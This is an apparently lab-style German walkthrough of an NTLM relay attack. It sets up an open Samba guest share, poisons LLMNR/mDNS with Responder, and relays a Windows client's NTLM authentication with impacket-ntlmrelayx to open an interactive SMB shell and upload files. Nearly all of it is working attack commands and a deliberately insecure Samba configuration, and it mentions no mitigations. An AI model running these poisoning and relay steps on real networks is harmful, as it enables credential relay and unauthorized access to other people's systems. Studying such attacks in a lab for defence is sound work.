NTLM-Relay auf Samba-Freigabe mit Impacket

Ziel

Ein Windows-Client im selben Netz wird über LLMNR oder mDNS vergiftet. Seine NTLM-Authentifizierung wird durch den Angreifer mit ntlmrelayx auf einen Samba-Server weitergeleitet. Der relayed Benutzer erhält Gastzugriff auf eine vorbereitete Freigabe. Der Angreifer kann darüber Dateien ablegen oder einsehen.

Samba-Ziel vorbereiten

• Samba-Konfiguration anpassen:

nano /etc/samba/smb.conf

[global]
   workgroup = WORKGROUP
   server role = standalone server
   passdb backend = tdbsam
   map to guest = Bad User
   guest account = nobody

[share]
   comment = Relayziel
   path = /mnt/media/share
   read only = no
   guest ok = yes
   public = yes
   browseable = yes
   force user = nobody
   force group = nogroup

• Verzeichnis vorbereiten:

mkdir -p /mnt/media/share
chown nobody:nogroup /mnt/media/share
chmod 777 /mnt/media/share

• Samba neu starten:

systemctl restart smbd

LLMNR/mDNS-Poisoning aktivieren

• Responder starten:

responder -I eth0

NTLM-Relay aktivieren

• Relay starten mit interaktivem SMB-Zugriff:

impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i --no-http-server --no-wcf-server --no-raw-server

NTLM-Angriff auslösen

• Am Windows-Client im Explorer ausführen:

\\irgendwas

• Der Client sendet eine vergiftbare Anfrage, wird relayed und landet mit seinen SMB-Anmeldedaten beim Samba-Ziel.

Erfolgreichen Zugriff nutzen

• Nach erfolgreicher Authentifizierung erscheint im Terminal:

[!] Interactive shell opened

• Dort können Befehle abgesetzt werden:

ls
upload /tmp/beispiel.txt
exit

• Die Datei liegt anschließend im Share-Verzeichnis auf dem Zielsystem:

ls -l /mnt/media/share

Ergebnis

NTLM-Relay wurde erfolgreich durchgeführt. Der relayed Benutzer konnte ohne gültige Authentifizierung auf eine Samba-Freigabe zugreifen und dort Dateien ablegen.